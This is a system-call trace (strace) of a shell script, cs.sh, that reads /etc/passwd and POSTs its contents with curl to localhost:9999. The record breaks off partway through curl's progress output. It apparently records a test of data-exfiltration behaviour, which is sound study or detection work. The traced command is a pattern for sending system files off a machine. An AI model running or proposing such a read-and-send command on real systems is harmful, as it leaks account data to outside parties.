1674570440.285059 execve("/usr/bin/sh", ["sh", "cs.sh"], 0x7fff881d13f8 /* 63 vars */) = 0
1674570440.285311 openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
1674570440.285369 close(3)              = 0
1674570440.285394 openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
1674570440.285419 read(3, "\177ELF\2\1\1\3\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0P\237\2\0\0\0\0\0"..., 832) = 832
1674570440.285658 close(3)              = 0
1674570440.285999 openat(AT_FDCWD, "cs.sh", O_RDONLY) = 3
1674570440.286039 fcntl(3, F_DUPFD, 10) = 10
1674570440.286069 close(3)              = 0
1674570440.286095 fcntl(10, F_SETFD, FD_CLOEXEC) = 0
1674570440.286198 read(10, "data=\"$(cat /etc/passwd)\"\ncurl -"..., 8192) = 117
1674570440.286235 pipe2([3, 4], 0)      = 0
1674570440.286281 clone(child_stack=NULL, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLDstrace: Process 227717 attached
, child_tidptr=0x7f7997dd1a10) = 227717
[pid 227716] 1674570440.286358 close(4) = 0
[pid 227716] 1674570440.286384 read(3,  <unfinished ...>
[pid 227717] 1674570440.286396 close(10) = 0
[pid 227717] 1674570440.286418 close(3) = 0
[pid 227717] 1674570440.286441 dup2(4, 1) = 1
[pid 227717] 1674570440.286463 close(4) = 0
[pid 227717] 1674570440.286587 execve("/usr/bin/cat", ["cat", "/etc/passwd"], 0x55cd34684068 /* 63 vars */) = 0
[pid 227717] 1674570440.286789 openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
[pid 227717] 1674570440.286843 close(3) = 0
[pid 227717] 1674570440.286872 openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
[pid 227717] 1674570440.286901 read(3, "\177ELF\2\1\1\3\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0P\237\2\0\0\0\0\0"..., 832) = 832
[pid 227717] 1674570440.287086 close(3) = 0
[pid 227717] 1674570440.287394 openat(AT_FDCWD, "/usr/lib/locale/locale-archive", O_RDONLY|O_CLOEXEC) = 3
[pid 227717] 1674570440.287465 close(3) = 0
[pid 227717] 1674570440.287533 openat(AT_FDCWD, "/etc/passwd", O_RDONLY) = 3
[pid 227717] 1674570440.287606 read(3, "root:x:0:0:root:/root:/bin/bash\n"..., 131072) = 2929
[pid 227717] 1674570440.287638 write(1, "root:x:0:0:root:/root:/bin/bash\n"..., 2929) = 2929
[pid 227716] 1674570440.287665 <... read resumed>"root:x:0:0:root:/root:/bin/bash\n"..., 128) = 128
[pid 227717] 1674570440.287679 read(3,  <unfinished ...>
[pid 227716] 1674570440.287691 read(3,  <unfinished ...>
[pid 227717] 1674570440.287703 <... read resumed>"", 131072) = 0
[pid 227716] 1674570440.287713 <... read resumed>"ys:/dev:/usr/sbin/nologin\nsync:x"..., 128) = 128
[pid 227716] 1674570440.287733 read(3, "/cache/man:/usr/sbin/nologin\nlp:"..., 128) = 128
[pid 227717] 1674570440.287755 close(3 <unfinished ...>
[pid 227716] 1674570440.287766 read(3,  <unfinished ...>
[pid 227717] 1674570440.287776 <... close resumed>) = 0
[pid 227716] 1674570440.287782 <... read resumed>":news:/var/spool/news:/usr/sbin/"..., 128) = 128
[pid 227717] 1674570440.287794 close(1 <unfinished ...>
[pid 227716] 1674570440.287804 read(3,  <unfinished ...>
[pid 227717] 1674570440.287817 <... close resumed>) = 0
[pid 227716] 1674570440.287826 <... read resumed>"ologin\nwww-data:x:33:33:www-data"..., 128) = 128
[pid 227717] 1674570440.287834 close(2 <unfinished ...>
[pid 227716] 1674570440.287842 read(3,  <unfinished ...>
[pid 227717] 1674570440.287849 <... close resumed>) = 0
[pid 227716] 1674570440.287855 <... read resumed>"iling List Manager:/var/list:/us"..., 128) = 128
[pid 227716] 1674570440.287865 read(3, "stem (admin):/var/lib/gnats:/usr"..., 128) = 128
[pid 227716] 1674570440.287887 read(3, "02:systemd Network Management,,,"..., 128) = 128
[pid 227716] 1674570440.287912 read(3, "sbin/nologin\nmessagebus:x:102:10"..., 128) = 128
[pid 227716] 1674570440.287936 read(3,  <unfinished ...>
[pid 227717] 1674570440.287947 +++ exited with 0 +++
1674570440.287952 <... read resumed>"n/systemd:/usr/sbin/nologin\nsysl"..., 128) = 128
1674570440.287964 --- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED, si_pid=227717, si_uid=1000, si_status=0, si_utime=0, si_stime=0} ---
1674570440.287987 read(3, "s:x:106:112:TPM software stack,,"..., 128) = 128
1674570440.288011 read(3, "stemd Userspace OOM Killer,,,:/r"..., 128) = 128
1674570440.288031 read(3, "10:119:Avahi autoip daemon,,,:/v"..., 128) = 128
1674570440.288065 read(3, "n/nologin\ndnsmasq:x:112:65534:dn"..., 128) = 128
1674570440.288084 read(3, "usr/sbin/nologin\navahi:x:114:121"..., 128) = 128
1674570440.288102 read(3, "-pk-helper service,,,:/home/cups"..., 128) = 128
1674570440.288126 read(3, "17:124::/nonexistent:/bin/false\n"..., 128) = 128
1674570440.288149 read(3, "ech Dispatcher,,,:/run/speech-di"..., 128) = 128
1674570440.288168 read(3, "sbin/nologin\nsaned:x:121:128::/v"..., 128) = 128
1674570440.288186 read(3, "rd:/usr/sbin/nologin\ngeoclue:x:1"..., 128) = 128
1674570440.288209 read(3, "sbin/nologin\ngnome-initial-setup"..., 128) = 128
1674570440.288228 read(3, ":/bin/false\ngdm:x:127:133:Gnome "..., 128) = 128
1674570440.288252 read(3, "esh:x:128:137:fwupd-refresh user"..., 128) = 113
1674570440.288276 read(3, "", 128)      = 0
1674570440.288294 close(3)              = 0
1674570440.288315 wait4(-1, [{WIFEXITED(s) && WEXITSTATUS(s) == 0}], 0, NULL) = 227717
1674570440.288342 wait4(-1, 0x7ffdfdf6902c, WNOHANG, NULL) = -1 ECHILD (No child processes)
1674570440.288521 vfork(strace: Process 227718 attached
 <unfinished ...>
[pid 227718] 1674570440.288592 execve("/usr/bin/curl", ["curl", "-X", "POST", "-droot:x:0:0:root:/root:/bin/bas"..., "localhost:9999"], 0x55cd34686ae8 /* 63 vars */ <unfinished ...>
[pid 227716] 1674570440.288660 <... vfork resumed>) = 227718
[pid 227716] 1674570440.288681 wait4(-1,  <unfinished ...>
[pid 227718] 1674570440.288703 <... execve resumed>) = 0
[pid 227718] 1674570440.288790 openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
[pid 227718] 1674570440.288831 close(3) = 0
[pid 227718] 1674570440.288853 openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libcurl.so.4", O_RDONLY|O_CLOEXEC) = 3
[pid 227718] 1674570440.288874 read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\0\0\0\0\0\0\0\0"..., 832) = 832
[pid 227718] 1674570440.288971 close(3) = 0
[pid 227718] 1674570440.288990 openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libz.so.1", O_RDONLY|O_CLOEXEC) = 3
[pid 227718] 1674570440.289012 read(3, "\177ELF\2\1\1\3\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\0\0\0\0\0\0\0\0"..., 832) = 832
[pid 227718] 1674570440.289100 close(3) = 0
[pid 227718] 1674570440.289118 openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
[pid 227718] 1674570440.289138 read(3, "\177ELF\2\1\1\3\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0P\237\2\0\0\0\0\0"..., 832) = 832
[pid 227718] 1674570440.289258 close(3) = 0
[pid 227718] 1674570440.289278 openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libnghttp2.so.14", O_RDONLY|O_CLOEXEC) = 3
[pid 227718] 1674570440.289298 read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\0\0\0\0\0\0\0\0"..., 832) = 832
[pid 227718] 1674570440.289372 close(3) = 0
[pid 227718] 1674570440.289390 openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libidn2.so.0", O_RDONLY|O_CLOEXEC) = 3
[pid 227718] 1674570440.289411 read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\0\0\0\0\0\0\0\0"..., 832) = 832
[pid 227718] 1674570440.289484 close(3) = 0
[pid 227718] 1674570440.289502 openat(AT_FDCWD, "/lib/x86_64-linux-gnu/librtmp.so.1", O_RDONLY|O_CLOEXEC) = 3
[pid 227718] 1674570440.289522 read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\0\0\0\0\0\0\0\0"..., 832) = 832
[pid 227718] 1674570440.289602 close(3) = 0
[pid 227718] 1674570440.289620 openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libssh.so.4", O_RDONLY|O_CLOEXEC) = 3
[pid 227718] 1674570440.289640 read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\0\0\0\0\0\0\0\0"..., 832) = 832
[pid 227718] 1674570440.289730 close(3) = 0
[pid 227718] 1674570440.289748 openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libpsl.so.5", O_RDONLY|O_CLOEXEC) = 3
[pid 227718] 1674570440.289769 read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\0\0\0\0\0\0\0\0"..., 832) = 832
[pid 227718] 1674570440.289842 close(3) = 0
[pid 227718] 1674570440.289860 openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libssl.so.3", O_RDONLY|O_CLOEXEC) = 3
[pid 227718] 1674570440.289881 read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\0\0\0\0\0\0\0\0"..., 832) = 832
[pid 227718] 1674570440.289959 close(3) = 0
[pid 227718] 1674570440.289977 openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libcrypto.so.3", O_RDONLY|O_CLOEXEC) = 3
[pid 227718] 1674570440.289997 read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\0\0\0\0\0\0\0\0"..., 832) = 832
[pid 227718] 1674570440.290084 close(3) = 0
[pid 227718] 1674570440.290104 openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libgssapi_krb5.so.2", O_RDONLY|O_CLOEXEC) = 3
[pid 227718] 1674570440.290125 read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\0\0\0\0\0\0\0\0"..., 832) = 832
[pid 227718] 1674570440.290208 close(3) = 0
[pid 227718] 1674570440.290227 openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libldap-2.5.so.0", O_RDONLY|O_CLOEXEC) = 3
[pid 227718] 1674570440.290247 read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\0\0\0\0\0\0\0\0"..., 832) = 832
[pid 227718] 1674570440.290347 close(3) = 0
[pid 227718] 1674570440.290367 openat(AT_FDCWD, "/lib/x86_64-linux-gnu/liblber-2.5.so.0", O_RDONLY|O_CLOEXEC) = 3
[pid 227718] 1674570440.290388 read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\0\0\0\0\0\0\0\0"..., 832) = 832
[pid 227718] 1674570440.290477 close(3) = 0
[pid 227718] 1674570440.290496 openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libzstd.so.1", O_RDONLY|O_CLOEXEC) = 3
[pid 227718] 1674570440.290516 read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\0\0\0\0\0\0\0\0"..., 832) = 832
[pid 227718] 1674570440.290591 close(3) = 0
[pid 227718] 1674570440.290610 openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libbrotlidec.so.1", O_RDONLY|O_CLOEXEC) = 3
[pid 227718] 1674570440.290631 read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\0\0\0\0\0\0\0\0"..., 832) = 832
[pid 227718] 1674570440.290707 close(3) = 0
[pid 227718] 1674570440.290728 openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libunistring.so.2", O_RDONLY|O_CLOEXEC) = 3
[pid 227718] 1674570440.290749 read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\0\0\0\0\0\0\0\0"..., 832) = 832
[pid 227718] 1674570440.290824 close(3) = 0
[pid 227718] 1674570440.290843 openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libgnutls.so.30", O_RDONLY|O_CLOEXEC) = 3
[pid 227718] 1674570440.290865 read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\0\0\0\0\0\0\0\0"..., 832) = 832
[pid 227718] 1674570440.290952 close(3) = 0
[pid 227718] 1674570440.290972 openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libhogweed.so.6", O_RDONLY|O_CLOEXEC) = 3
[pid 227718] 1674570440.290993 read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\0\0\0\0\0\0\0\0"..., 832) = 832
[pid 227718] 1674570440.291085 close(3) = 0
[pid 227718] 1674570440.291104 openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libnettle.so.8", O_RDONLY|O_CLOEXEC) = 3
[pid 227718] 1674570440.291125 read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\0\0\0\0\0\0\0\0"..., 832) = 832
[pid 227718] 1674570440.291198 close(3) = 0
[pid 227718] 1674570440.291216 openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libgmp.so.10", O_RDONLY|O_CLOEXEC) = 3
[pid 227718] 1674570440.291237 read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\0\0\0\0\0\0\0\0"..., 832) = 832
[pid 227718] 1674570440.291311 close(3) = 0
[pid 227718] 1674570440.291333 openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libkrb5.so.3", O_RDONLY|O_CLOEXEC) = 3
[pid 227718] 1674570440.291354 read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\0\0\0\0\0\0\0\0"..., 832) = 832
[pid 227718] 1674570440.291439 close(3) = 0
[pid 227718] 1674570440.291457 openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libk5crypto.so.3", O_RDONLY|O_CLOEXEC) = 3
[pid 227718] 1674570440.291478 read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\0\0\0\0\0\0\0\0"..., 832) = 832
[pid 227718] 1674570440.291567 close(3) = 0
[pid 227718] 1674570440.291586 openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libcom_err.so.2", O_RDONLY|O_CLOEXEC) = 3
[pid 227718] 1674570440.291607 read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\0\0\0\0\0\0\0\0"..., 832) = 832
[pid 227718] 1674570440.291689 close(3) = 0
[pid 227718] 1674570440.291707 openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libkrb5support.so.0", O_RDONLY|O_CLOEXEC) = 3
[pid 227718] 1674570440.291731 read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\0\0\0\0\0\0\0\0"..., 832) = 832
[pid 227718] 1674570440.291812 close(3) = 0
[pid 227718] 1674570440.291832 openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libsasl2.so.2", O_RDONLY|O_CLOEXEC) = 3
[pid 227718] 1674570440.291858 read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\0\0\0\0\0\0\0\0"..., 832) = 832
[pid 227718] 1674570440.291945 close(3) = 0
[pid 227718] 1674570440.292006 openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libbrotlicommon.so.1", O_RDONLY|O_CLOEXEC) = 3
[pid 227718] 1674570440.292032 read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\0\0\0\0\0\0\0\0"..., 832) = 832
[pid 227718] 1674570440.292118 close(3) = 0
[pid 227718] 1674570440.292139 openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libp11-kit.so.0", O_RDONLY|O_CLOEXEC) = 3
[pid 227718] 1674570440.292165 read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\0\0\0\0\0\0\0\0"..., 832) = 832
[pid 227718] 1674570440.292250 close(3) = 0
[pid 227718] 1674570440.292272 openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libtasn1.so.6", O_RDONLY|O_CLOEXEC) = 3
[pid 227718] 1674570440.292297 read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\0\0\0\0\0\0\0\0"..., 832) = 832
[pid 227718] 1674570440.292398 close(3) = 0
[pid 227718] 1674570440.292424 openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libkeyutils.so.1", O_RDONLY|O_CLOEXEC) = 3
[pid 227718] 1674570440.292450 read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\0\0\0\0\0\0\0\0"..., 832) = 832
[pid 227718] 1674570440.292533 close(3) = 0
[pid 227718] 1674570440.292556 openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libresolv.so.2", O_RDONLY|O_CLOEXEC) = 3
[pid 227718] 1674570440.292581 read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\0\0\0\0\0\0\0\0"..., 832) = 832
[pid 227718] 1674570440.292673 close(3) = 0
[pid 227718] 1674570440.292698 openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libffi.so.8", O_RDONLY|O_CLOEXEC) = 3
[pid 227718] 1674570440.292722 read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\0\0\0\0\0\0\0\0"..., 832) = 832
[pid 227718] 1674570440.292819 close(3) = 0
[pid 227718] 1674570440.294750 pipe2([3, 4], 0) = 0
[pid 227718] 1674570440.294782 close(3) = 0
[pid 227718] 1674570440.294804 close(4) = 0
[pid 227718] 1674570440.295273 openat(AT_FDCWD, "/usr/lib/ssl/openssl.cnf", O_RDONLY) = 3
[pid 227718] 1674570440.295335 read(3, "#\n# OpenSSL example configuratio"..., 4096) = 4096
[pid 227718] 1674570440.295382 read(3, "r type CA, the listed attributes"..., 4096) = 4096
[pid 227718] 1674570440.295436 read(3, "r:copy\n\n# DER hex encoding of an"..., 4096) = 4096
[pid 227718] 1674570440.295491 read(3, "ertout # insta.cert.pem\n\n[ssl_se"..., 4096) = 131
[pid 227718] 1674570440.295517 read(3, "", 4096) = 0
[pid 227718] 1674570440.295539 close(3) = 0
[pid 227718] 1674570440.295718 openat(AT_FDCWD, "/usr/lib/locale/locale-archive", O_RDONLY|O_CLOEXEC) = 3
[pid 227718] 1674570440.295768 close(3) = 0
[pid 227718] 1674570440.295807 openat(AT_FDCWD, "/home/ueno/.curlrc", O_RDONLY) = -1 ENOENT (No such file or directory)
[pid 227718] 1674570440.295849 socket(AF_UNIX, SOCK_STREAM|SOCK_CLOEXEC|SOCK_NONBLOCK, 0) = 3
[pid 227718] 1674570440.295875 connect(3, {sa_family=AF_UNIX, sun_path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)
[pid 227718] 1674570440.295912 close(3) = 0
[pid 227718] 1674570440.295935 socket(AF_UNIX, SOCK_STREAM|SOCK_CLOEXEC|SOCK_NONBLOCK, 0) = 3
[pid 227718] 1674570440.295958 connect(3, {sa_family=AF_UNIX, sun_path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)
[pid 227718] 1674570440.295985 close(3) = 0
[pid 227718] 1674570440.296029 openat(AT_FDCWD, "/etc/nsswitch.conf", O_RDONLY|O_CLOEXEC) = 3
[pid 227718] 1674570440.296067 read(3, "# /etc/nsswitch.conf\n#\n# Example"..., 4096) = 542
[pid 227718] 1674570440.296098 read(3, "", 4096) = 0
[pid 227718] 1674570440.296129 close(3) = 0
[pid 227718] 1674570440.296152 openat(AT_FDCWD, "/etc/passwd", O_RDONLY|O_CLOEXEC) = 3
[pid 227718] 1674570440.296195 read(3, "root:x:0:0:root:/root:/bin/bash\n"..., 4096) = 2929
[pid 227718] 1674570440.296224 close(3) = 0
[pid 227718] 1674570440.296249 openat(AT_FDCWD, "/home/ueno/.curlrc", O_RDONLY) = -1 ENOENT (No such file or directory)
[pid 227718] 1674570440.296365 socket(AF_INET6, SOCK_DGRAM, IPPROTO_IP) = 3
[pid 227718] 1674570440.296389 close(3) = 0
[pid 227718] 1674570440.296424 fcntl(3, F_GETFL) = 0x2 (flags O_RDWR)
[pid 227718] 1674570440.296445 fcntl(3, F_SETFL, O_RDWR|O_NONBLOCK) = 0
[pid 227718] 1674570440.296466 fcntl(4, F_GETFL) = 0x2 (flags O_RDWR)
[pid 227718] 1674570440.296487 fcntl(4, F_SETFL, O_RDWR|O_NONBLOCK) = 0
[pid 227718] 1674570440.296581 socket(AF_INET, SOCK_STREAM, IPPROTO_TCP) = 5
[pid 227718] 1674570440.296642 fcntl(5, F_GETFL) = 0x2 (flags O_RDWR)
[pid 227718] 1674570440.296661 fcntl(5, F_SETFL, O_RDWR|O_NONBLOCK) = 0
[pid 227718] 1674570440.296683 connect(5, {sa_family=AF_INET, sin_port=htons(9999), sin_addr=inet_addr("127.0.0.1")}, 16) = -1 EINPROGRESS (Operation now in progress)
[pid 227718] 1674570440.296765 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.296795 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.296818 write(2, "%", 1%) = 1
[pid 227718] 1674570440.296840 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.296863 write(2, "T", 1T) = 1
[pid 227718] 1674570440.296885 write(2, "o", 1o) = 1
[pid 227718] 1674570440.296909 write(2, "t", 1t) = 1
[pid 227718] 1674570440.296932 write(2, "a", 1a) = 1
[pid 227718] 1674570440.296958 write(2, "l", 1l) = 1
[pid 227718] 1674570440.296981 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.297006 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.297030 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.297053 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.297077 write(2, "%", 1%) = 1
[pid 227718] 1674570440.297102 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.297125 write(2, "R", 1R) = 1
[pid 227718] 1674570440.297150 write(2, "e", 1e) = 1
[pid 227718] 1674570440.297173 write(2, "c", 1c) = 1
[pid 227718] 1674570440.297197 write(2, "e", 1e) = 1
[pid 227718] 1674570440.297221 write(2, "i", 1i) = 1
[pid 227718] 1674570440.297247 write(2, "v", 1v) = 1
[pid 227718] 1674570440.297271 write(2, "e", 1e) = 1
[pid 227718] 1674570440.297294 write(2, "d", 1d) = 1
[pid 227718] 1674570440.297318 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.297342 write(2, "%", 1%) = 1
[pid 227718] 1674570440.297366 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.297389 write(2, "X", 1X) = 1
[pid 227718] 1674570440.297413 write(2, "f", 1f) = 1
[pid 227718] 1674570440.297437 write(2, "e", 1e) = 1
[pid 227718] 1674570440.297460 write(2, "r", 1r) = 1
[pid 227718] 1674570440.297484 write(2, "d", 1d) = 1
[pid 227718] 1674570440.297507 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.297531 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.297555 write(2, "A", 1A) = 1
[pid 227718] 1674570440.297579 write(2, "v", 1v) = 1
[pid 227718] 1674570440.297602 write(2, "e", 1e) = 1
[pid 227718] 1674570440.297626 write(2, "r", 1r) = 1
[pid 227718] 1674570440.297650 write(2, "a", 1a) = 1
[pid 227718] 1674570440.297673 write(2, "g", 1g) = 1
[pid 227718] 1674570440.297697 write(2, "e", 1e) = 1
[pid 227718] 1674570440.297721 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.297745 write(2, "S", 1S) = 1
[pid 227718] 1674570440.297769 write(2, "p", 1p) = 1
[pid 227718] 1674570440.297792 write(2, "e", 1e) = 1
[pid 227718] 1674570440.297816 write(2, "e", 1e) = 1
[pid 227718] 1674570440.297840 write(2, "d", 1d) = 1
[pid 227718] 1674570440.297863 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.297887 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.297911 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.297935 write(2, "T", 1T) = 1
[pid 227718] 1674570440.297958 write(2, "i", 1i) = 1
[pid 227718] 1674570440.297982 write(2, "m", 1m) = 1
[pid 227718] 1674570440.298006 write(2, "e", 1e) = 1
[pid 227718] 1674570440.298029 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.298053 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.298077 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.298102 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.298125 write(2, "T", 1T) = 1
[pid 227718] 1674570440.298150 write(2, "i", 1i) = 1
[pid 227718] 1674570440.298177 write(2, "m", 1m) = 1
[pid 227718] 1674570440.298208 write(2, "e", 1e) = 1
[pid 227718] 1674570440.298235 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.298260 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.298298 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.298332 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.298357 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.298385 write(2, "T", 1T) = 1
[pid 227718] 1674570440.298412 write(2, "i", 1i) = 1
[pid 227718] 1674570440.298439 write(2, "m", 1m) = 1
[pid 227718] 1674570440.298466 write(2, "e", 1e) = 1
[pid 227718] 1674570440.298495 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.298524 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.298549 write(2, "C", 1C) = 1
[pid 227718] 1674570440.298571 write(2, "u", 1u) = 1
[pid 227718] 1674570440.298594 write(2, "r", 1r) = 1
[pid 227718] 1674570440.298616 write(2, "r", 1r) = 1
[pid 227718] 1674570440.298638 write(2, "e", 1e) = 1
[pid 227718] 1674570440.298660 write(2, "n", 1n) = 1
[pid 227718] 1674570440.298682 write(2, "t", 1t) = 1
[pid 227718] 1674570440.298704 write(2, "\n", 1
) = 1
[pid 227718] 1674570440.298726 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.298748 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.298770 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.298820 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.298842 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.298864 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.298887 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.298909 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.298931 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.298954 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.298976 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.298999 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.299021 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.299043 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.299065 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.299087 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.299109 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.299130 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.299152 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.299174 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.299196 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.299218 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.299240 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.299263 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.299285 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.299307 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.299329 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.299351 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.299373 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.299394 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.299416 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.299438 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.299460 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.299482 write(2, "D", 1D) = 1
[pid 227718] 1674570440.299504 write(2, "l", 1l) = 1
[pid 227718] 1674570440.299526 write(2, "o", 1o) = 1
[pid 227718] 1674570440.299548 write(2, "a", 1a) = 1
[pid 227718] 1674570440.299570 write(2, "d", 1d) = 1
[pid 227718] 1674570440.299592 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.299614 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.299636 write(2, "U", 1U) = 1
[pid 227718] 1674570440.299658 write(2, "p", 1p) = 1
[pid 227718] 1674570440.299680 write(2, "l", 1l) = 1
[pid 227718] 1674570440.299702 write(2, "o", 1o) = 1
